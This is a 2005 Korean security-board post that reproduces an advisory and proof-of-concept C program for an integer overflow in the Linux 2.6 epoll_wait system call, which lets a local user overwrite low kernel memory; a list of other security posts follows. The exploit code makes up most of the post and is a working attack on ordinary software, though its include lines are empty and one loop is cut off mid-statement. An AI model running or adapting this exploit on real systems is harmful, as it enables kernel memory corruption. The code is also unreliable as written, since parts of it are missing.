아이디/패스워드 기억
최근사진
Total : 76,112
Yesterday : 17
Today : 73

overwriting low kernel memory

ino | 2005.03.23 15:02 | 조회 1370
it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) memory
due to integer overflow in sys_epoll_wait and misuse of __put_user
in ep_send_events


tested on i386.
despite the overflow, the os seemingly continues normal operation.


fix:
http://linux.bkbits.net:8080/linux-2.6/cset@422dd06a1p5PsyFhoGAJseinjEq3ew?nav=index.html|ChangeSet@-1d


-------------------------------------------------
/*
* copyright georgi guninski.
* cannot be used in vulnerabilities databases like securityfocus and mitre
* */
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#undef __KERNEL__


#define MAXV 500


int main(int argc,char ** argv)
{
int epfd;
int i;
int res;
struct epoll_event ev;
int *fds;
int over;
void *km;


over= ((unsigned int)-1)/sizeof(struct epoll_event)+1;
km=(void *)(TASK_SIZE - over*sizeof(struct epoll_event) - 4);
printf("sizeof=%d %x %lx\n",sizeof(struct epoll_event),over,(unsigned long)km);


epfd = epoll_create(MAXV);
printf("Epoll descriptor %i\n",epfd);
fds=calloc(2*MAXV,sizeof(int));
for(i=0;i {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2*i])) perror("pair");
ev.data.u32 = 0x42424242;
ev.events = EPOLLOUT|EPOLLIN | 0x42424242;
res = epoll_ctl(epfd,EPOLL_CTL_ADD,fds[2*i],&ev);
}
for(i=0;i

system("sync");


for(i = 0; i < 1; i++)
{
res = epoll_wait(epfd,km,over,-1);
printf("epoll_wait returned %i\n",res);
printf("check what is after TASK_SIZE\n");
}


close(epfd);
return 42;
}

twitter facebook me2day 요즘
110개(1/6페이지)
보안
번호 제목 글쓴이 조회 날짜
110 공유기별 기본 패스워드 및 포트포워딩 위치. 몰라맨 191 2016.07.25 09:58
109 usb 사용흔적제거에 강력한 유틸 몰라맨 155 2014.03.14 21:33
108 Adobe Flash Player/Reader/Acrobat 신규 취약점 몰라맨 189 2011.03.21 10:10
107 제로보드 보안 패치 pl9 첨부파일 ino 417 2009.02.10 18:45
106 [일반] Google's new Web browser (Chrome) allows ino 440 2008.09.05 09:47
105 [일반] 해킹의 표적 -가상 메모리 파일(Pagefile.sys)을 윈도우 종료시 ino 608 2008.02.19 13:25
104 [일반] 시스템 분석 - 추적 비밀글 ino 5 2008.02.05 16:16
103 [일반] Updated sendmail packages fix security i ino 1115 2006.04.18 10:37
102 [일반] 공개 웹 게시판 제로보드 취약점 패치 권고 ino 3500 2006.04.02 18:22
101 [일반] Microsoft Windows WMF/EMF File Handling ino 1214 2005.11.17 11:13
100 [일반] openssl 보안 업데이트 ino 1208 2005.10.17 21:19
99 [일반] Linux Kernel Local Denial of Service and ino 1206 2005.10.11 23:29
98 [일반] Kaspersky Anti-Virus Products Remote Hea ino 1034 2005.10.04 15:20
97 [일반] ProZilla "ftpsearch" Option Client-Side ino 1071 2005.10.03 18:40
96 [일반] Updated kernel packages fix security iss ino 2342 2005.06.19 17:43
95 [일반] MySQL MaxDB Webtool Remote Stack Overflo ino 1421 2005.05.11 21:39
94 [일반] IBM AS/400 LDAP Server User Accounts Dis ino 1420 2005.04.06 11:01
93 [일반] PHP 4.x/5.x Denial of Service and Securi ino 1410 2005.04.03 13:23
92 [일반] Linux Kernel v2.6.10 Remote Denial of Se ino 1424 2005.03.30 21:22
>> [일반] overwriting low kernel memory ino 1371 2005.03.23 15:02